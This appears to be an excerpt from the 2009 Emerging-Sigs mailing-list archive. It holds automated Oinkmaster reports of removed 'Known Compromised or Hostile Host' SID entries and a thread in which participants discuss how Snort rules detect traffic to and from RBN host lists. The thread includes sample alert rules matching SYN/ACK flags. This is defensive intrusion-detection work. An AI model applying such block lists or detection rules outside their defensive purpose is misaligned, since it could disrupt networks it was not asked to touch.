        2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From phatbuckett at gmail.com  Mon May 25 17:11:38 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Mon, 25 May 2009 14:11:38 -0700
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A1ACE8A.2040205@trojanedbinaries.com>
References: <4A131D81.3040907@jonkmans.com>
	<4A133285.1060104@trojanedbinaries.com>
	<4A13383B.1000608@jonkmans.com>
	<4A136CA5.1080303@trojanedbinaries.com>
	<20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com>
	<4A1ACE8A.2040205@trojanedbinaries.com>
Message-ID: <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>

Some may be interested in attempts to communicate and not only
established connections. The 'any' port spec may allow ports that are
filtered for example, but can be useful to know about connection
attempts regardless.

DS

On Mon, May 25, 2009 at 9:59 AM, Eoin Miller
<eoin.miller at trojanedbinaries.com> wrote:
> Can't believe this didn't occur to me sooner, but if reversing the
> flow/direction is really going to be a problem, why not look for the
> response SYN/ACK packet instead of the initial SYN when setting up the
> TCP connection?
>
> alert tcp [<RBN IP LIST>] any -> $HOME_NET any (flags: SA;) = alert!
> alert tcp $HOME_NET any -> [<RBN IP LIST>] any (flags: SA;) = nothing
>
> Now back to memorial day yard work....
>
> --
> Eoin Miller
>
>
> Matt Jonkman wrote:
>> What if, ignoring the reversing homenet/extnet thing, we just go with
>> flow:established on the tcp sigs and make it directionless?
>>
>> That'll eliminate a lot of the noise and only give you an alert when you
>> have a box talking to them.
>>
>> Then we don't need to open a new sid range or reverse the directions, so
>> no one has to redo blocking/response rules.
>>
>> Matt
>>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Darren Spruell
phatbuckett at gmail.com

From eoin.miller at trojanedbinaries.com  Tue May 26 00:46:06 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Tue, 26 May 2009 00:46:06 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>
References: <4A131D81.3040907@jonkmans.com>
	<4A133285.1060104@trojanedbinaries.com>
	<4A13383B.1000608@jonkmans.com>
	<4A136CA5.1080303@trojanedbinaries.com>
	<20090520030114.GA42575@knobbe.us> <4A142D5E.4050201@jonkmans.com>
	<4A1ACE8A.2040205@trojanedbinaries.com>
	<839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>
Message-ID: <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>

Except that the rules, as they were, cause about 60-70% packet loss on  
~250mbit/s link. So you aren't exactly catching all the alerts on even  
just moderate speed links you are monitoring. Looking for the SYN's  
only catches connections coming inbound from the RBN network and you  
are generally more concerned with people reaching out to the RBN as  
they are downloading malware/joining botnets from behind your NAT'd  
firewalls.

Looking for the SYN/ACK flagged packet fixes the issue with the rules  
currently only looking for the SYN packet without flipping the  src/dst.

--
Eoin Miller

On May 25, 2009, at 5:11 PM, Darren Spruell wrote:

> Some may be interested in attempts to communicate and not only
> established connections. The 'any' port spec may allow ports that are
> filtered for example, but can be useful to know about connection
> attempts regardless.
>
> DS
>
> On Mon, May 25, 2009 at 9:59 AM, Eoin Miller
> <eoin.miller at trojanedbinaries.com> wrote:
>> Can't believe this didn't occur to me sooner, but if reversing the
>> flow/direction is really going to be a problem, why not look for the
>> response SYN/ACK packet instead of the initial SYN when setting up  
>> the
>> TCP connection?
>>
>> alert tcp [<RBN IP LIST>] any -> $HOME_NET any (flags: SA;) = alert!
>> alert tcp $HOME_NET any -> [<RBN IP LIST>] any (flags: SA;) = nothing
>>
>> Now back to memorial day yard work....
>>
>> --
>> Eoin Miller
>>
>>
>> Matt Jonkman wrote:
>>> What if, ignoring the reversing homenet/extnet thing, we just go  
>>> with
>>> flow:established on the tcp sigs and make it directionless?
>>>
>>> That'll eliminate a lot of the noise and only give you an alert  
>>> when you
>>> have a box talking to them.
>>>
>>> Then we don't need to open a new sid range or reverse the  
>>> directions, so
>>> no one has to redo blocking/response rules.
>>>
>>> Matt
>>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>
>
>
> -- 
> Darren Spruell
> phatbuckett at gmail.com


From emerging at emergingthreats.net  Tue May 26 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue, 26 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090526200011.F1B514504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Tue May 26 16:00:11 2009 [***]

[*] Rules modifications: [*]
    None.

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (76):
        2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (76):
        2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From wkitty42 at windstream.net  Tue May 26 17:45:25 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Tue, 26 May 2009 17:45:25 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>
References: <4A131D81.3040907@jonkmans.com>	<4A133285.1060104@trojanedbinaries.com>	<4A13383B.1000608@jonkmans.com>	<4A136CA5.1080303@trojanedbinaries.com>	<20090520030114.GA42575@knobbe.us>
	<4A142D5E.4050201@jonkmans.com>	<4A1ACE8A.2040205@trojanedbinaries.com>	<839aec700905251411v54dc822em14b2447a71841423@mail.gmail.com>
	<3D537FAD-14EE-4193-9FE1-022380E728D4@trojanedbinaries.com>
Message-ID: <4A1C62F5.8030100@windstream.net>

Eoin Miller wrote:
> only catches connections coming inbound from the RBN network and you  
> are generally more concerned with people reaching out to the RBN as  
> they are downloading malware/joining botnets from behind your NAT'd  
> firewalls.

yes and no... we do not want /any/ access attempts to out network allowed... 
from inside or "cold calling" probes from outside... we see where a two layered 
approach is a GoodThing<tm>... the first layer being to monitor for any access 
attempts to our network from any/all RBN networks... the second, being the 
